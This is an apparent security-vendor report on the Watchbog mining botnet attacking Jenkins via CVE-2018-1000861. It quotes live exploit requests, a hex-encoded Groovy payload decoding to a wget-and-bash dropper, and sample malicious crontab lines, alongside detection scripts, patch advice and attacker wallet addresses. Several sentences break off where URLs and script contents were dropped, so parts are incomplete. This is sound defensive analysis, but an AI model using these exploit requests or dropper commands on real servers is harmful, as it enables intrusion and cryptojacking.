Return of Watchbog: Exploiting Jenkins CVE-2018-1000861

On May 12, 2019, we observed Watchbog, a cryptocurrency-mining botnet, launching a large-scale attack against Jenkins. Infected servers do not automatically attack their peers, so the trojan itself is not self-propagating. It still causes losses to victims by mining cryptocurrency and by adding malicious commands to scheduled tasks for persistence.

The Watchbog botnet is not new; it has a track record. Earlier this year we observed Watchbog attacking services such as Nexus Repository Manager 3, ThinkPHP and Linux Supervisord and deploying miners with a very similar technique. The process is straightforward, as shown in the figure below:

This article gives insight into the attack and offers suggestions for cleaning up the malware and preventing future intrusions.

Start of Attack

We found the following request on a victim Jenkins server, exploiting CVE-2018-1000861:

GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=True&value=public class x{public x(){new String("776765742068747470733a2f2f706173746562696e2e636f6d2f7261772f42335235556e7768202d4f202f746d702f62616279".decodeHex()).execute()}} HTTP/1.1
Host: [victim_host]:[jenkins_port]

This payload differs from the exploit for CVE-2019-1003000 that we saw in another botnet campaign, run by ImposterMiner, in February:

GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(,%20root=%27http://,%20module=%27poc%27,%20version=%278%27)%0aimport%20Orange; HTTP/1.1
Host: [victim_host]:[jenkins_port]

The two payloads look alike because both go through the /securityRealm/user/admin/descriptorByName route. They are nonetheless different vulnerabilities: CVE-2018-1000861 is in the Stapler web framework that Jenkins is built on, while CVE-2019-1003000 is in the Script Security Plugin. That is also why patching one does not close the other.

The hex-encoded string in the CVE-2018-1000861 payload decodes to a shell command that downloads and runs a dropper:

wget https://pastebin.com/raw/B3R5Unwh -O /tmp/baby
bash /tmp/baby
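Both request shapes above are easy to pick out of captured HTTP traffic, and the hex literal can be decoded mechanically. The following triage helper is an added example written for this article, not code from the original post or from the Watchbog scripts: it parses request lines, recognises the descriptorByName route, decodes any "<hex>".decodeHex() literal in the script parameter, and flags @Grab usage. The regular-expression names and the three sample request lines are constructed for the example (two of them reproduce the requests quoted above; the first is a benign login request for contrast).

```python
import re
from urllib.parse import urlsplit, parse_qs

# Jenkins' descriptorByName route under /securityRealm/user/<name>/ is what
# CVE-2018-1000861 lets an unauthenticated client reach. Capture the
# descriptor class and the form-validation method that is being invoked.
DESCRIPTOR_RE = re.compile(
    r"/securityRealm/user/[^/]+/descriptorByName/([\w.$]+)/(\w+)"
)
# Groovy idiom the Watchbog payload uses to hide the shell command.
HEX_LITERAL_RE = re.compile(r'new String\("([0-9A-Fa-f]+)"\.decodeHex\(\)\)')
# @Grab annotations are the ingredient of the CVE-2019-1003000 style payload.
GRAB_RE = re.compile(r"@Grab(?:Config|Resolver|Exclude)?\(")
# "METHOD target HTTP/x.y"; the target may itself contain spaces, as the
# unencoded Groovy in the first request shows, so anchor on both ends.
REQUEST_LINE_RE = re.compile(r"^([A-Z]+)\s+(.+)\s+HTTP/\d\.\d$")


def decode_hex_literals(script):
    """Decode every "<hex>".decodeHex() literal found in a Groovy snippet."""
    return [bytes.fromhex(h).decode("utf-8", errors="replace")
            for h in HEX_LITERAL_RE.findall(script)]


def triage_request_line(request_line):
    """Classify one HTTP request line.

    Returns None when the request does not hit descriptorByName, otherwise a
    dict with the descriptor class, the method, the sandbox flag, any decoded
    hex commands and whether the script uses @Grab.
    """
    m = REQUEST_LINE_RE.match(request_line.strip())
    if not m:
        return None
    parts = urlsplit(m.group(2))
    d = DESCRIPTOR_RE.search(parts.path)
    if not d:
        return None
    # parse_qs splits on the first '=' only and percent-decodes the value.
    params = parse_qs(parts.query, keep_blank_values=True)
    script = params.get("value", [""])[0]
    return {
        "descriptor": d.group(1),
        "method": d.group(2),
        "sandbox": params.get("sandbox", [""])[0].lower() == "true",
        "hex_commands": decode_hex_literals(script),
        "uses_grab": bool(GRAB_RE.search(script)),
    }


def scan_request_lines(lines):
    """Return (line_number, triage) for every request line that matches."""
    hits = []
    for n, line in enumerate(lines, 1):
        t = triage_request_line(line)
        if t:
            hits.append((n, t))
    return hits


# Constructed sample: the two request lines quoted in the article plus a
# benign request, the way they would appear in a captured HTTP stream.
SAMPLE_REQUESTS = [
    "GET /login HTTP/1.1",
    'GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=True&value=public class x{public x(){new String("776765742068747470733a2f2f706173746562696e2e636f6d2f7261772f42335235556e7768202d4f202f746d702f62616279".decodeHex()).execute()}} HTTP/1.1',
    "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(,%20root=%27http://,%20module=%27poc%27,%20version=%278%27)%0aimport%20Orange; HTTP/1.1",
]

if __name__ == "__main__":
    for n, t in scan_request_lines(SAMPLE_REQUESTS):
        print(f"line {n}: {t['descriptor']}.{t['method']} sandbox={t['sandbox']}")
        for cmd in t["hex_commands"]:
            print("   decoded:", cmd)
        if t["uses_grab"]:
            print("   uses @Grab")
```

Run against the sample, the second line yields the decoded wget command shown above and the third is flagged for @Grab; a legitimate form-validation call from a logged-in user hits the same route, so treat a hit as a starting point for review rather than proof of compromise, and pair it with the source IP and session context.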

The downloaded file points to another pastebin URL, which in turn points to yet another.

The main part of the malicious shell script is encoded and placed in

Mining and Persistence

While that shell script runs, a cryptocurrency miner is installed on the victim server by downloading it from the following URL (decoded from $mi_64)

The mining configuration file is as follows:

The malicious shell script maintains persistence by adding itself to the crontab.

Other crontab files that were tampered with:
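The crontab contents themselves are not reproduced here, but the pattern the article describes (a scheduled job that re-downloads a dropper and runs it) is what a cleanup should look for on every crontab on the host. The following scanner is an added example written for this article, not code from the original post or from the Watchbog scripts. It parses user crontabs and, with has_user_field=True, the /etc/crontab and /etc/cron.d format, and flags jobs that fetch remote content, pipe into a shell, or execute from a temporary directory. The sample crontab is constructed for the example; the domain example.invalid and the check names are assumptions, not indicators from the incident.

```python
import re

# Constructed sample crontab (not taken from the page): one legitimate job
# plus two entries in the style of a download-and-execute dropper.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=root
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * (curl -fsSL https://example.invalid/raw/abc123 || wget -q -O- https://example.invalid/raw/abc123) | bash
@reboot /tmp/baby
"""

# A job line is either an @shortcut or five schedule fields, then the command.
CRON_LINE_RE = re.compile(r"^\s*(@\w+|(?:\S+\s+){4}\S+)\s+(.+?)\s*$")

# Traits a dropper's persistence entry tends to show; any one is worth a look.
CHECKS = {
    "downloads-remote-content": re.compile(r"\b(?:curl|wget)\b.*https?://"),
    "pipes-to-shell": re.compile(r"\|\s*(?:ba|z|da)?sh\b"),
    "runs-from-tmp": re.compile(r"(?:^|[\s(;&|])(?:/tmp|/var/tmp|/dev/shm)/"),
}


def parse_crontab(text, has_user_field=False):
    """Return (schedule, command) for every job line in a crontab.

    Comments, blank lines and VAR=value assignments are skipped. Set
    has_user_field=True for /etc/crontab and /etc/cron.d/* files, where a
    user name sits between the schedule and the command.
    """
    jobs = []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        m = CRON_LINE_RE.match(stripped)
        if not m:
            continue  # VAR=value lines and malformed entries
        schedule, command = m.group(1), m.group(2)
        if has_user_field:
            parts = command.split(None, 1)
            command = parts[1] if len(parts) == 2 else ""
        jobs.append((schedule, command))
    return jobs


def classify(command):
    """Return the sorted list of check names that match a cron command."""
    return sorted(name for name, rx in CHECKS.items() if rx.search(command))


def find_suspicious(text, has_user_field=False):
    """Return every job whose command trips at least one check."""
    hits = []
    for schedule, command in parse_crontab(text, has_user_field):
        reasons = classify(command)
        if reasons:
            hits.append({"schedule": schedule, "command": command,
                         "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_CRONTAB):
        print(hit["schedule"], "|", hit["command"])
        print("   ", ", ".join(hit["reasons"]))
```

On a real host, feed it the output of crontab -l for every user (including root) plus /etc/crontab and each file under /etc/cron.d and /var/spool/cron; removing a flagged entry is only useful once the process it spawns has been killed and its binary deleted, otherwise the running miner simply re-adds it.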

Ironically, the threat actor says victims can contact him at and promises to provide a “cleanup script, source of entry and patch”.

According to, the threat actor may have earned about 20 Monero (roughly 1,500 USD at the time) from mining.

It is also worth mentioning that we reported the malicious URLs to and requested that those addresses be banned when Watchbog first started its attack in March. However, has not replied or taken any effective action.

Security Suggestion

  • Services meant for internal use should not be exposed to the Internet. Use an adequate ACL or another authentication mechanism so that only trusted users can reach them.
  • Upgrade software promptly, especially once the vendor has published a security advisory. For the two vulnerabilities above that means Jenkins 2.154 (LTS 2.138.4) or later for CVE-2018-1000861 and Script Security Plugin 1.50 or later for CVE-2019-1003000; fixing one does not cover the other.
  • Since has been used by many botnets, users who do not normally visit that site can make its host name resolve to nothing locally; on Linux, append an entry of the form 0.0.0.0 followed by the host name to /etc/hosts, for example: echo -e "\n0.0.0.0" >> /etc/hosts. Note what this does and does not do: it only changes name resolution on that host, so connections by host name fail, but it does not drop packets, does not affect connections made directly to an IP address, and does nothing against a dropper that is served from a different site.
  • A cloud firewall helps prevent attacks like this one. We recommend Alibaba Cloud Firewall, which can detect, block and analyze threats, including intrusion attempts and malicious mining.
  • Alibaba Cloud Managed Security Service gives users access to Alibaba's security specialists, who can help clean up malware, improve configurations and raise overall security. If you are concerned about your organization's security, consider it.

Monero wallet addresses:

44gaihcvA4DHwaWoKgVWyuKXNpuY2fAkKbByPCASosAw6XcrVtQ4VwdHMzoptXVHJwEErbds66L9iWN6dRPNZJCqDhqni3B (previous)
47k2wdnyyBoMT6N9ho5Y7uQg1J6gPsTboKP6JXfB5msf3jUUvTfEceK5U7KLnWir5VZPKgUVxpkXnJLmijau3VZ8D2zsyL7 (current)

pool address:

local path: